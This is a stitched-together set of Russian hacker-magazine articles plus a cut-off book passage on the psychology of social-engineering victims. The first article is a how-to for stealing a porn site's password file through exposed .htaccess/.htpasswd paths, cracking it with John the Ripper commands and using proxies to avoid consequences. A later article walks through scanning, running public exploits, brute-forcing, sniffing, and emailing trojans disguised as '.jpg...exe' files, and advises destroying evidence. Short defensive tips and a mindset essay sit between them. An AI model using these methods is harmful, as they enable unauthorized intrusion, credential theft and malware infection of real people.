Сегодня мы будем иметь (в хорошем смысле) порно сайты! Тебе наверное надоело лазить по бесплатным порно-сайтам, заходя на которые, открываются ещё 50 окошек . Ну ладно будем добывать базу паролей порно-сайта. Чем не мечта для халявщика, коим ты и являешься? Вобще этот спорсоб катит с любым сайтом, но ведь порносайты наиболее неустойчивы к взломам, ты только представь себе админа порносайта =). Только предупреждение: за возможные траблы по поводу твоего взлома я никакой ответственности, естественно, не несу. Приступим же, наконец, к трепанации adult-ресурсов =). Описание процесса У каждого порносайта есть несколько зон. Нет, не эрогенных, как ты может подумал, а просто зон =). Ты, наверное, видел при заходе на какой-либо такой сайт менюшки типа Free Tour, Register и For Members. Первая нам нахрен не нужна, хотя, если хочешь получить общее представление о тематике фоток и вообще порно-сайта, можешь быстренько пробежаться и по ней. Вторая менюшка, Register, имхо предназначена либо для толстых озабоченных онанистов =), либо для ламаков, у которых руки не из того места растут. Так как к нам это, естественно, не относится, то выбираем последний пункт - For Members (для членов, хехе =) Тут ты, введя пароль и логин для входа, попадёшь на сайт. Принцип действия таков: введя пароль с логином, ты оправляешь форму, где она сравнивается со списком паролей зарегистрированных онанистов и в случае полного соответствия пропускает тебя внутрь. Ни пароля, ни логина ты, конечно, пока не знаешь. Вот мы и займемся тем, как бы их свистнуть =). На некоторых порносайтах (но не всех!) до сих пор есть такая рульная для нас фишка, как баг .htaccess Этот файл содержит множество инфы - от списка локализации различных ресурсов до, в некоторых случаях, паролей. А последние нам как раз нужны! В большинстве своём .htaccess является сортировщиком в отношении доступа к дирам и, есесно, к файлам. С его помощью мы можем просмотреть скрытые или запрещённые диры через броузер. Для получения доступа к файлу в URL'е хакер знает какой длины, нам будет достаточно ввести основной адрес хоста, слэш ( \ ), нэйм самого файла или диру, еще раз слэш, и в конце .htaccess Доступ обеспечен. Принцип порно-сайтовской системы достаточно прост, главное пораскинь мозгами. Ты можешь изучить структуру каталогов и, чуть попарившись, вывести passwordlist, но для этого нужно быть знакомым с атакуемой системой. Ты должен знать, как там построены директории, какой в них лежит принцип. Потому как если неверно задашь диру - ничего не получится соответственно =(. Но можно поступить проще - Хакер опять приходит тебе на помощь! =) Просто сходи на http://ultrapasswords.com/. Зашел? Ну что же, отлично. На этом кульном сайте ты сможешь найти сотни пассов для различных буржуйских порно-сайтов. Только не кидайся сломя голову на первый попавшийся сайт, со счастливым видом вводя увиденный там пароль. Мы же делом заняты! =) Итак, возьми на обозначенном серваке пароль к тому сайту, который хочешь хакнуть. Даже если не нашел (что вряд ли), то возьми пасс для другого сайта: мы же должны что-то взломать! =) Затем, с полученный логином и паролем войди в зону для членов ака Member Zone. Теперь ты внутри! =) Обрати сейчас внимание на урл, он может иметь примерно такой вид: http://www.pornosite_name.com/members/index.html, или на конце может быть default.html, но это не важно. Важно другое: вместо index.html вставь заветное .htaccess Тогда строка адреса примет такой вид: http://www.pornosite_name.com/members/.htaccess Теперь, если тебе повезет, ты должен увидеть примерно следующее: AuthUserFile /www/pornosite_name/members/.htpasswd именно нужное нам место, где лежит файл с паролями (может быть и другая структура директорий, я взял эту лишь для примера). AuthGroupFile /dev/null здесь находится groupfile AuthName Members Only Directory помнишь то окошко, которое требует ввести логин/пасс? Вот оно-то и лежит по этому адресу =). Кроме этого здесь, возможно, будет и другая инфа, которая нам не и нужна. В итоге теперь ты знаешь, где находится нужный нам файл с паролями. Он так и называется passwordfile. Ты, наверное, уже ручки от удовольствия потираешь, но обломись: пароли все зашифрованы. Например: suporgazm:71aLc8qpWPzd, где suporgazm-логин, а 71aLc8qpWPzd-зашифрованный пароль. Но спешу тебя утешить: это поправимо =). Просто берешь и с родимого http://astalavista.box.sk/ скачиваешь известную тебе прогу "John the Ripper". Все найденные пароли сохраняешь в текстовый файл и притом не где попало, а в ту диру, куда ты заинсталлил "Джона". Теперь, чтобы расшифровать пароли, заюзай следующие команды: John xxx.txt -single (Самый быстрый способ, и в то же время самый простой алгоритм) John xxx.txt -wordfile:password.lst (Это посложней, можно сказать, самый средний по всем параметрам метод) John xxx.txt -incremental (Это самый сложный алгоритм и занимает время, но он и самый надежный) Выбирай нужную и действуй! В итоге, ты имеешь всю базу паролей желанного порносайта, к чему, собственно, мы и стремились. Вот и все! Видишь, как все просто? А ты-то думал… =) Таким образом можно поиметь и множество других сайтов, используя баг файла .htaccess. Но делай это как можно осторожней: не мне тебя учить этому, хацкер. Чтобы снизить вероятность траблов на свою задницу, всегда используй прокси, взятые, например, со http://spylog.ru/. Удачи тебе, хацкер!

Постоянно слышу вопрос, ни разу не видел хорошего ответа. Как-то даже видел книгу с таким названием. В ее первой главе автор на полном серьезе советовал почувствовать себя дерьмом, чтобы преисполниться нужных эмоций и настроиться на взлом. Что ж, удачи тем, кому этот способ понравился, а у меня другое видение проблемы. Рискну высказать. Хакер – человек, способный выжать все возможное из того, что у него в распоряжении. Поэтому, имея такой же доступ к системе, что и обычный человек, он иногда способен ее взломать (именно «иногда», бывают случаи, когда систему нельзя взломать в принципе). Вот и все, что отличает хакера от простого смертного. Соответственно инструкция по апгрейду от простого смертного до хакера проста - измените себя так, чтобы выделенные высказывания относительно вас были справедливы... Способность получить все, что теоретически возможно получить, дается доскональным знанием системы и особым складом ума, не пропускающим никакие варианты, особенно нетривиальные. Обо всех составляющих по порядку. Доскональное знание системы – это понимание того, как система работает. Для понимания работы программы идеально подходят исходники в сочетании с умением их читать, то есть понимать алгоритм по тексту программы. Опытные хакеры способны понимать программу, написанную на языке, который они никогда в жизни не видели. Не всегда исходники доступны, тогда может пригодиться знание ассемблера и отладчиков, которое позволяет понимать алгоритм любой программы, находящейся на подконтрольном компьютере. Это тяжелее. В самом тяжелом (и самом частом) случае, когда программа находится на удаленном компьютере, и хакер ничего о ней не знает, приходится лишь догадываться, как она устроена. Тут требуется опыт анализа и написания аналогичных программ и программ вообще. Короче говоря, хакеру совсем не помешает быть опытным программистом. У серверных программ есть еще одна особенность – полезно знать протокол, по которому она работает. Протокол – набор правил, по которому общаются стороны (программы, компьютера, системы). Он нужен для того, чтобы стороны могли понимать друг друга. Большинство протоколов хорошо описаны авторами, лишь изредка приходится сталкиваться с недокументированными протоколами и догадываться, что они из себя представляют. Описания большинства протоколов есть на сайтах RFC, вот один из них: http://the.rfceditor.org/ У протоколов могут быть слабые места - проблема, которую автор программы не может исправить – он просто выбрал не тот протокол, возможно, он сам не знает его слабых мест. А вот вам их знать надо. Бывает, что программист допускает отклонения от реализации протокола. Чтобы найти их, просто попробуйте сказать другой стороне не то, что она ждет, и увидите, чем это кончится. Идеально написанная программа должна ответить «ошибка протокола», но при неправильной реализации может произойти нечто, чего не предусмотрел создатель, и что окажется полезно хакеру. Полезно знать об ошибках, допускаемых разработчиками, и о методах их использования (exploit). Детальная информация о них излагается в так называемых security advisory, которые можно встретить на сайтах серьезных групп, занимающихся проблемами безопасности. Всемирная база данных advisory есть на www.securityfocus.com, полезно почитать. Это все, что касается знаний. Теперь - о мозгах. Мозги не должны быть застарелыми, иначе дальше использования известных дырок и средств автоматизированного взлома «хакер» не пойдет. Для тестирования застарелости мозгов предлагаю такую шуточную задачку про обкуренную ласточку . Требуемый уровень знаний – 5 класс, однако, чем человек старше, тем сложнее ее решить… Поезд едет из А в Б. Расстояние – 120 км. Скорость поезда – 40 км/час. Навстречу поезду из Б вылетает ласточка со скоростью 60 км/час, долетает до поезда, разворачивается и летит обратно в Б, разворачивается, летит к поезду… Так до тех пор, пока оба они не прибудут в Б. Вопрос: какое расстояние пролетела ласточка? Второе требование – любовь к brainfucking’у. Переводить слово целиком не буду, скажу только, что brain – «мозги». Так вот, хакер обязан любить brainfucking, иначе не сможет заниматься исследованиями, без которых он – жалкая, ничтожная личность, паразитирующая на чужих достижениях . Последнее требование, о котором я скажу, скорее психологическое. Хакеру предстоит устоять перед славой, не «спопситься», ведь понтоваться перед толпой на порядок проще, чем заниматься серьезными исследованиями. Если он не устоит, то станет просто клоуном, работающим на потеху зрителям, и на этом его развитие остановится. Если после прочтения текста вы все еще не передумали становиться хакером - вперед! Удачи.

Сегодня тебе предстоит познакомиться с теорией взлома. Вобще самый лучший админ - это хакер. Точно так же можно сказать, что самый лучший хакер - это злой админ . Этот текст представлен прежде всего как руководство по защите твоей системы. И помни про существование закона, в котором предусмотрены не хилые наказания за информационный вандализм! Приступим: Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться. Самое первое, с чего начинается взлом или тест системы на дырявость - сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт - это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но это только если ты будешь обладать соответствующими правами. Первое, что нужно просканировать - первые 1024 порта. Среди них очень много стандартных сервисов типа FTP, HTTP, Telnet и т.д. Все открытие порты - это дверь с замочком для входа на сервер. Чем больше таких дверей, тем больше вероятность, что какой-то замок не выдержит натиска и откроется.У хорошего админа открыты только самые необходимые порты. Например, если это WEB-сервер не предоставляющий доступ к почте, то нет смысла держать сервисы почтовых серверов. Хороший сканер портов не только говорит номер открытого порта, но и показывает название установленного на нем сервиса. Желательно, чтобы сканер умел сохранять результат своей работы в каком-нибудь файле. Если этой возможности нет, то придется переписать все вручную и положить на видное место. В дальнейшем тебе пригодиться каждая строчка твоих записей. После этого можешь сканировать порты свыше 1024. Здесь стандартные сервисы встречаются редко. Зачем же тогда сканировать? А вдруг кто-то до тебя уже побывал здесь и оставил открытую дверку или протроянил сервак. Большинство троянов держат открытыми порты свыше 1024, поэтому если ты админ и нашел открытый порт с номером больше 1024, необходимо сразу насторожиться. Ну а если ты взломщик, то необходимо узнать имя трояна и найти для него клиентскую часть. На этом взлом может закончиться, потому что ты уже получил полный доступ к серваку без особых усилий . Определяем ОС: Теперь мы знаем, какие двери у сервера открыты и чем мы можем воспользоваться. Но этого мало, потому что мы знаем какие есть двери, но не знаем, как их открыть. Сканирование - это всего лишь самый начальный этап, который тебе еще ничего особенного не сказал. Самое главное перед взломом - определить, какая ОС стоит на серваке. Желательно знать и версию, но это удается не всегда, да и на первых парах изучения системы можно обойтись без конкретизации. Для определения версии я могу посоветовать Shadow Scan. Не могу сказать, что она лучшая, но и к разряду худших отнести ее не имею права. Помимо определения ОС, прога умеет определять версии установленных сервисов. Это тебе может очень сильно помочь. Допустим, что ты узнал, что на серваке установлен WEB-сервер. Ты даже узнал, что ОС именует себя как "Окошки". Ты можешь предположить, что WEB-сервер именует себя как IIS, но это предположение может тебя обмануть. Для окошек есть реализация сильнейшего сервера Apache. А так как взлом разных серверов производиться по разному, то тебя должно в первую очередь волновать, кто именно сидит на 80-м порту - IIS или Apache. Единственный недостаток Shadow Scan - именно при определении версии ОС некоторые релизы Shadow Scan вылетали в синий экран. Но в последней версии этот баг вроде исправлен.Адрес этой распрекрасной тулзы ты можешь найти во врезке "Download". Юзаем порты : Итак, теперь ты знаешь, какая на сервере установлена ОС, какие порты открыты, и какие именно серверы висят на этих портах. Вся эта инфа должна быть у тебя записана в удобном для восприятия виде, хоть в файле, хоть на бумаге. Не ленись всю собранную инфу записывать и собирать в одну кучу. Помни, что даже компьютерные мозги иногда дают сбои, а человеческие делают это регулярно. Самое интересное, что чаще всего забывается самое необходимое. Ну а после взлома не поленись уничтожить, иначе ты облегчишь работу нашей доблестной милиции. Все записал? Ну, на этом можно остановить взлом. У тебя есть достаточно инфы для простейшего взлома по уже пройденным другими хаксорами следам. Просто посещай регулярно www.securityfocus.com. Здесь ты должен поискать информацию о дырявости установленных на серванте жертвы сервисов и самой ОС. Уже давно известно, что большая часть серверов (по некоторым данным 70%, а по некоторым 90%) в инете просто не латаются. Поэтому проверь все найденные эксплоиты на жертве, возможно, что-то подойдет. Если сервер хорошо залатан, то придется ждать появления новых дыр и експлоитов к установленным на сервере сервисам. Как только увидишь что-нибудь интересное, сразу качай експлоит и юзай свежую дырку, пока админ ее не залатал. Тестирование безопасности : Практически каждый день специалисты по безопасности находят в разных системах недочеты и откровенно говоря дыры или даже пробоины в системе безопасности. Все эти пробоины выкладываются в отчетах BugTraq на разных серверах. Я тебе уже посоветовал посещать www.securityfocus.com, чтобы следить за новостями, и сейчас не отказываюсь от своих слов. Новинки действительно надо смотреть на этом сервере, но ведь есть еще ворох старых дыр, которые могли быть, и не залатаны на сервере. Как же поступить с ними? Не ужели придется качать все эксплоиты и ручками проверять каждую пробоину? Ну конечно же нет. Существует громадное количество прог для автоматизации тестирования сервера на залатанность. Ты думаешь я должен посоветовать тебе какую-нибудь определенную прогу? Нет, я этого делать не буду, потому что все программы хороши. Не существует такой тулзы, в которой была бы база абсолютно всех потенциальных дыр. Поэтому качай все, что попадется под руку. Возможно что-то тебе и пригодиться. Взлом WWW-серванта : При взломе WWW-серванта есть свои особенности. Если на сервере крутятся CGI страницы, то взлом такого серванта нужно начинать совершенно по-другому. Для начала нужно просканировать его на наличие дырявых CGI скриптов. Ты не поверишь, но опять же по исследованиям крутых дядек, в инете громадное количество скриптов дырявые. Дырявость скриптов связана с тем, что для кодинга страничек используется Perl. Я ничего не имею против этого языка, но он сейчас достиг уровня универсала. На нем можно делать практически все, а не только форматировать текст. Поэтому в Perl очень много потенциально опасных функций. Но это не так страшно. Страшнее, когда ты можешь этим функциям передавать свои данные, когда скрипты не проверяют введенную пользователем инфу, а в чистом виде передают параметры в опасные функции. Другие языки (PHP, ASP и др) тоже имеют потенциально опасные функции, просто там их или поменьше, или они имеют дополнительную защиту. Единственный более менее защищенный язык - Java, который очень сильно тормозит систему, из-за чего его не охотно используют WEB-мастера. Я не собираюсь тебя лечить карявостью языков кодинга, потому что главная корявость - руки программера. Из-за громадной нехватки спецов в нашей любимой области, кодингом стали заниматься все кому не лень. Многие программеры самоучки даже не пытаются задуматься о безопасности. А тебе это только на руку. И так, твоя главная задача - запастись парочкой хороших CGI-сканеров. Какой лучше? Ответ однозначный - ВСЕ. Даже в самом плохом сканере может оказаться инфа о такой уязвимости, о которой не известно даже самому крутому. А главное, что по закону подлости именно эта уязвимость окажется доступной на серваке. Я советую тебе скачать побольше сканеров, поищи в иНете =). Серп и молот : Там где не возможно взломать сервер с помощью мозгов, всегда можно воспользоваться чисто русским методом - серпом и молотом. Это не значит, что серп нужно представлять к горлу админа, а молотком стучать по макушке. Просто всегда можно воспользоваться тупым подбором паролей. Давай снова обратимся к статистике. Все исследовательские конторы пришли к одному и тому же выводу, что большинство ушастых выбирают в качестве пароля имена своих любимых собачек, кошечек, даты рождения или номера телефонов. Так что хорошо подобранный словарь может сломать практически любую систему, потому что везде есть ламеры. Ты до сих пор еще не веришь мне? Давай вспомним знаменитейший червь Морриса, который проникал в систему, взламывая ее по словарю. Словарь был достаточно маленький и состоял менее чем из ста слов. Помимо этого, червь использовал в переборе слова из словаря установленного в системе. Там тоже слов не так уж много. И вот благодаря такому примитивному алгоритму, червь смог поразить громаднейшее число компов и серваков. Это был один из самых массовых взломов!!! Взлом по словарю очень часто используется для взлома мыльников, FTP паролей и другой чешуи. Но прежде чем приступать к такому взлому, советую хорошо отредактировать словари имен и паролей. Очень важно знать, какую систему ты взламываешь. Например, если это оконный сервер, то желательно, чтобы среди логинов был "Администратор". Ну а если это *nix система, то обязательно должен присутствовать "root", а все логины типа "Администратор" можно послать куда подальше. Неплохо было бы вставить в словарь любые имена и пароли используемые по умолчанию для разных сервисов. Очень часто админы забывают или просто ленятся поменять пароли на сервисы, которые запущены, но они ими не пользуются. Эта лень очень часто проявляется у админов окошек и это связано с тем, что в окошках уровень знаний спецов намного ниже. Например, я очень много встречал MS SQL Server 7.0 c логином по умолчанию в "sa" и абсолютно без пароля. Наверно поэтому M$ собирается убрать этот логин уже в следующей версии своего сервера баз данных. Для тупого перебора я опять могу посоветовать Shadow Scan (ну люблю я эту тулзу, что тут поделаешь). В нем есть очень хороший генератор словарей и реализованы подборщики по всем основным протоколам. Взлом локалки : В локалке есть свои особенности. Например, если она построена на основе коаксиала или витой пары соединенной через хабы, то весь сетевой трафик обязательно проходит через твою машину. Почему же ты его не видишь? Просто ОС и сетевуха сговорились и не показывает тебе чужой трафик. Но если очень сильно захотеть, то можно воспользовавшись снифером пронюхать все данные проходящие мимо твоей сетевой карточки. Сейчас в сети можно скачать громадное количество сниферов и примочек к ним. Я опять не буду советовать тебе что-то конкретное, потому что лично я не могу выделить однозначного лидера среди сниферов. Разные версии заточены под разные нужды, и тут нужно выбирать именно из этого соображения. Если ты конкретно ищешь пароли, то тебе нужен тот, что умеет выделять информацию о регистрации из общего трафика сети. Троянус : Самый тупой и самый ненадежный в отношении админов способ. Хотя админы и бывают ламерами, но на такие шутки уже никто не катит. Но кто сказал, что в сетке существуют только админы? Есть еще куча ламеров с большими привилегиями и маленькими мозгами. Вот именно их и надо троянить. Как забрасывать троян? Самый распространенный способ - почтовый ящик. Просто даешь трояну какое-нибудь заманчивое имя и отправляешь письмо жертве. Если он запустит твой трой, то считай, что ты царь и бог на его компе. Теперь тебе будет доступно все, что может для тебя сделать твой боевой конь. Какое дать имя, чтобы заинтересовать ламера? Очень просто, окна очень часто прячут расширения всех зарегистрированных в системе типов файлов. В этом случае, если ты назовешь файл как Anna_Kurnikova.jpg.exe, окна спрячут последнее расширение и любой лам подумает, что видит картинку. Для большей надежности, файл лучше всего назвать даже так: Anna_Kurnikova.jpg...........exe. В этом случае, если даже расширение не прячется по умолчанию, его все равно видно не будет Любое письмо с трояном желательно снабдить хорошим текстом, чтобы заинтересовать чела запустить находящийся в нем файл. Итог : Эта статья не претендует на полноту, но я постарался дать все необходимые начальные сведения. Просто нас очень часто упрекают, что мы забываем про начинающих, и очень часто грузят вопросами типа: "Как взломать сервант?". Теперь ты сможешь залезть в танк и катиться дальше вместе с нами. Я заведомо не затрагивал тему получения халявного инета, потому что тут очень много своих особенностей. Но один из возможных способов я все же описал - трояны. Вообще, этот способ практически универсальный и может использоваться везде. Я так же надеюсь, что продвинутые челы тоже смогли найти для себя нечто интересное или новое. Покедова, надеюсь еще увидимся. Дополнительная инфа : http://www.cert.ru/ - хороший сервант по известным дырам. Радует, что он на русском, а огорчает редкость обновления и не все дыры описываются. http://www.cert.org - то же самое, что и предыдущее, только на английском языке. http://www.securityfocus.com - это я тебе уже рекомендовал, поэтому просто напоминаю. http:/www.void.ru -отличный сервант на русском языке. Можешь сделать его стартовой страницей. Не верь глазам своим!: Сейчас мы поговорим о том, как различные проги определяет семейство ОС установленной на серваке. Для этого есть несколько способов: 1. По реализации протокола TCP/IP. Разные корпорашки по разному реализуют стек протоколов в своих ОС. Программа просто анализирует ответы на запросы от сервера и делает вывод об установленной ОС. В основном этот вывод расплывчатый типа Windows или Linux. Точную версию таким образом сказать невозможно. Допустим, что прога сказала, что на серваке установлен Linux, но какой именно дистрибутив тебе никто не скажет. А ведь дыры в разных дистрибутивах разные и поэтому такая инфа - это только половина необходимого тебе для взлома сервера. 2. По ответам разных сервисов. Допустим, что на сервере жертвы есть анонимный доступ по FTP. Тебе нужно всего лишь присоединиться к нему и посмотреть сообщение приглашения в систему. По умолчанию, в качестве приглашения используется надпись типа "Добро пожаловать на сервер FreeBSD4.0 версия FTP клиента Х.ХХХ". Если ты такое увидел, то можно и радоваться и плакать, потому что это может быть и правдой.Если надпись приглашения отражает действительность, то админ - лох со стажем. Нормальный админ всегда изменяет приглашение по умолчанию. А вот хороший админ может написать и ложное сообщение. Например, на сервере с Windows 4.0 можно увидеть приглашение в Linux. В этом случае можно безуспешно потратить очень много времени в попытках сломать окна через дыры Linux. Поэтому не особо доверяй надписям и старайся перепроверить любыми другими способами. 3. Социальная инженерия. Если ты хочешь взломать сервант хостинговой компании, то можно отправить письмо админу с запросом об установленных у него серверах. В основном админы или служба поддержки не скрывают эту инфу, но бывают случаи и вранья. Возможно, что эта инфа будет лежать даже на главной странице сервера, но даже это следует проверить. Чтобы тебя не надули, обязательно обращай внимания на используемые на сервере сервисы, например, в Linux врят ли будут крутиться страницы созданные по технологии ASP. Hack-Download : В этой врезке я постараюсь дать тебе список всех программ, которые тебе понадобятся при тестировании системы на дырявость. CyD NET Utils - всегда можно скачать с сайта www.cydsoft.com/vr-online. эта программа писалась не для взлома а для тестирования локальных сетей на работоспособность и безопасность. Так что если ты админ, то желательно иметь эту прогу в своем арсенале. В CyD NET Utils присутствует удобный сканер портов, пингер, WhoIs и многое другое. Результат работы можно всегда можно сохранить файл или распечатать. Shadow Scan - отличная прога с большим количеством возможностей для тестирования системы на вшивость. Что-то говорит мне, что написана нашими братьями по разуму из ближней Украины. NT Crack - прога проверки NT на вшивость. Если ты хочешь взломать оконный сервер, то эта прога должна быть в твоем арсенале. Ну а если хочешь защитить NT, то тем более. NT Bugs - достаточно приличного размера описание багов оконного сервера. Если ты владеешь буржуйским языком, то просто обязан иметь ее в своем арсенале. LC4 - самый знаменитый и крутейший подборщик паролей для NT. Retina Network Security Scanner (http://www.eeye.com/) - хороший сканер безопасности. Вот не знаю я, и за что я в него такой влюбленный ? Короткий словарик : Демон - серверная программа, которая работает в фоне и предназначена для выполнения каких-либо действий. Этот термин применяется в *nix средах. Там названия таких прог в основном отличаются тем, что в конце имени стоит буква "d". Представим себе демон WEB сервера. Это должна быть прога, которая висит в памяти и ждет подключения на 80-й порт (это по умолчанию). Как только кто-то подсоединился, демон начинает принимать запросы и отвечать на них. Но демоны бывают не только сетевые, потому к сетевым, например, невозможно отнести демон печати. Сервисы - это то же самое, что и демоны, только так называют те же проги в окошках. Експлоит - прога, которая умеет пользоваться какой-нибудь уязвимостью сервака. Если он написан под *nix, то может поставляться в исходных кодах. В этом случае, перед использованием потребуеться компиляция. Порт - Каждая сетевая программа при старте открывает для себя любой свободный порт. Есть и зарезервированные типа FTP это 21-й порт, HTTP это 80 порт и т. д. Теперь представим ситуацию, что на сервере запущено два сервиса: FTP и WEB. Это значит, что на сервере работает две программы, к которым можно коннектиться. Теперь ты хочешь присоединиться к FTP серверу и посылаешь запрос по адресу ХХХ.ХХХ.ХХХ.ХХХ и на порт 21. Сервер получает такой запрос и по номеру порта определяет, что твой запрос относиться именно к FTP серверу, а не WEB. Так что сетевые порты - это что-то виртуальное, что увидеть невозможно. Если бы не было портов, то комп не смог бы определить для кого именно пришел твой запрос. Троян - прога, которая незаметно сидит в системе жертвы и позволяет тебе управлять его компом.

1. Запретите или сделайте невозможным то,что не разрешено явным образом. 2. Всегда устанавливайте пароль,сделайте его сложным и часто меняйте(если есть что скрывать). 3. Следите за обновлениями используемого программного обеспечения. 4. Для всех типов доступа предоставляйте лишь необходимый минимум привелегиий(чем меньше тем лучше). 5. Ограничьте доверие. 6. Относитесь ко всем внешним интерфейсам с особой "параноей" (в том числе и к телефонным подключениям!). 7. Должны быть включены системы мониторинга, ведение журнала и аудита. 8. Обеспечьте возможность реагирования на проишествия,непрерывность работы. 9. Помните технология не защитит ВАС от СОЦИАЛЬНЫХ атак (Поменьше трепись о личном). 10.И вообще разработайте политику безопасности, сделайте ее полной и широко распределённой. 11. Определяйте реальный риск вторжения. 12. Изучите свои платформы и программы лучше врага. Прежде чем атаковать нужно научитья обороняться!

По­пал в чу­жую ко­лею, глу­бокую… В. Вы­соц­кий На пер­вый взгляд, этот раз­дел дан­ной гла­вы ни­како­го от­но­шения к со­ци­аль­но­му прог­рамми­рова­нию и со­ци­аль­ной ин­же­нерии не име­ет. Од­на­ко мы вклю­чили в нас­то­ящую кни­гу этот раз­дел хо­тя бы по од­ной при­чине: что­бы чи­татель смог по­луч­ше ра­зоб­рать­ся в лю­дях, и в от­но­шени­ях меж­ду ни­ми. И, са­мое глав­ное, в глу­бин­ных при­чинах этих от­но­шений. По­чему у од­них все хо­рошо, а у дру­гих все пло­хо? Хо­тя, ка­залось бы, стар­то­вые ус­ло­вия оди­нако­вые. По­чему один ку­да бы не ус­тро­ил­ся — у не­го все хо­рошо на ра­боте, а у дру­гого — все пло­хо? По­чему к од­но­му по­дош­ли со­ци­аль­ные ха­керы, не­важ­но кто, хоть цы­ган­ки те же, и он им рас­ска­зал все, что знал и от­дал, все что имел. А к дру­гому пять раз под­хо­дили — а ему "как с гу­ся во­да", знай толь­ко се­бе пос­ме­ива­ет­ся и приг­ла­ша­ет шес­той раз поп­ро­бовать. В дан­ном раз­де­ле мы пос­та­ра­ем­ся дать от­вет на эти воп­ро­сы. …Иной раз ка­жет­ся, что ка­кому-то че­лове­ку на ро­ду на­писа­но быть не­удач­ни­ком, а дру­гому на­обо­рот — счас­тлив­чи­ком. И это пра­виль­ная фра­за. Дей­стви­тель­но, мно­гим из нас "на­писа­но на ро­ду". До­рогой чи­татель, ус­по­кой­тесь… Ав­то­ры — не мис­ти­ки и не фа­талис­ты. Мы лишь прос­то нем­но­го зна­комы с пси­холо­ги­ей. И зна­ем, кто пи­шет нам те скрип­ты, по ко­торым мно­гие из нас дей­ству­ют всю жизнь. И пос­та­ра­ем­ся рас­ска­зать вам об этом в дан­ном раз­де­ле. Яс­но, что ата­кам со­ци­аль­ных ха­керов, как пра­вило, под­верже­ны лю­ди, ска­жем так, с точ­ки зре­ния пси­холо­гии не впол­не пол­но­цен­ные. Проб­лемные лю­ди, т. е. те, у ко­го слиш­ком мно­го не­решен­ных проб­лем, ком­плек­сов… Эти лю­ди жи­вут не по сво­ей во­ле, хо­тя им ка­жет­ся, что по сво­ей. Они всег­да вы­пол­ня­ют чью-то чу­жую во­лю, они в "чу­жой ко­лее"… …Их вид­но в тол­пе: идут, пог­ру­зив­шись в свои мыс­ли, от­сутс­тву­ющий взгляд, не­уве­рен­ная по­ход­ка. По­тен­ци­аль­ные же жер­твы со­ци­аль­ных ха­керов, мо­шен­ни­ков и прес­тупни­ков всех мас­тей. Ввес­ти в транс та­кого че­лове­ка не сос­та­вит тру­да. А вот и дру­гие — бод­рая по­ход­ка, трез­вый взгляд, мо­гут оце­нивать си­ту­ацию. Это счас­тлив­чи­ки, лю­бим­цы жиз­ни. Кто же и ког­да пи­шет нам скрип­ты, по ко­торым мы жи­вем? Сов­ре­мен­ная пси­холо­гия зна­ет, что у че­лове­ка есть под­созна­тель­ный жиз­ненный план, сог­ласно ко­торо­му он жи­вет. Этот са­мый план и на­зыва­ет­ся скрип­том. Тер­мин этот вве­ден Э. Бер­ном, ос­но­вате­лем скрип­то­вого ана­лиза. Скрипт (или сце­нарий, как его еще иног­да на­зыва­ют) в пси­холо­гии, как пра­вило, упот­ребля­ет­ся в от­ри­цатель­ном смыс­ле. Та­ким об­ра­зом, ес­ли че­ловек не­удач­ник, зна­чит, он жи­вет в рам­ках ка­кого-то сце­нария или скрип­та. Не­удач­но­го, бе­зус­ловно. Ко­неч­но, бы­ва­ют и хо­рошие скрип­ты. Но пси­холо­ги, имея де­ло в ос­новном с пло­хими скрип­та­ми (счас­тли­вые лю­ди к пси­холо­гам не об­ра­ща­ют­ся), упот­ребля­ют сло­во скрипт, как пра­вило, в от­ри­цатель­ном смыс­ле. Вкла­дывая в это по­нятие то, что че­ловек "со скрип­том" уже не хо­зя­ин сво­ей жиз­ни, его пла­чев­ный итог уже пред­ре­шен мно­го ра­нее и, что­бы он не де­лал, выр­вать­ся из скрип­та он не смо­жет. Го­воря язы­ком те­ат­ра­лов, тра­гичес­кий итог пь­есы пред­ре­шен, у че­лове­ка есть воз­можность лишь слег­ка из­ме­нить дей­ствие по хо­ду пь­есы, но ка­ким пу­тем он бы не по­шел, это все рав­но при­ведет его к уже из­вес­тно­му ито­гу. …Бе­рем нес­коль­ких лю­дей и ко­па­ем яму. Нег­лу­бокую. Пос­ле это­го слу­чай­но взя­тому че­лове­ку за­вязы­ва­ем гла­за и от­во­дим на не­кото­рое рас­сто­яние от ямы (по пря­мой). Го­ворим, чтоб шел впе­ред. К яме. Суть в том, что нуж­но с за­вязан­ны­ми гла­зами в эту яму не про­валить­ся: ос­та­новить­ся сра­зу пе­ред ней. А те­перь смот­рим, что по­луча­ет­ся. Пер­вый по­шел. Два ша­га сде­лал рез­во, а по­том до са­мой ямы плел­ся, что твоя че­репа­ха Тор­тилла. Но не упал. По­дошел к са­мому краю, сде­лал шаг впе­ред, и по­чувс­тво­вал, что даль­ше хо­да нет. Вто­рой по­шел. Бе­гом бе­жит! И — о­оп-па! — ка­са­ет­ся од­ной но­гой са­мого края ямы и ее пе­реп­ры­гива­ет! Да… За это­го мож­но не бес­по­ко­ить­ся, у не­го в жиз­ни по­лучит­ся все и да­же боль­ше. Тре­тий — идет ров­но, спо­кой­но, но пря­мо у са­мого края встал, по­думал и даль­ше не по­шел. С этим то­же даль­ше все бу­дет нор­маль­но. А вот чет­вертый… Чет­вертый шел бод­ро, уве­рен­но, с улыб­кой, и упал в яму. Это­го мож­но по­доз­ре­вать на на­личие от­ри­цатель­но­го скрип­та. Вто­рой раз, тре­тий, чет­вертый, пя­тый — и все вре­мя па­да­ет. Все, поч­ти точ­но — это вик­тим (victim) (жер­тва). Ес­ли вик­тим стоп­ро­цен­тный, так ска­жем, то мож­но наб­лю­дать поч­ти мис­ти­чес­кие ве­щи. Мож­но от­вести его в сто­рону от ямы и ска­зать, что­бы ни­чего не бо­ял­ся и шел пря­мо. По­тому что яма в сто­роне и ни­чего ему не гро­зит. Ба! А пря­мо-то ему не идет­ся, яма эта при­тяги­ва­ет его как маг­ни­том, и вот он за­вора­чива­ет, за­вора­чива­ет, и… И сно­ва па­да­ет в яму. Хо­тя, ка­залось бы, шанс по­пасть в нее в 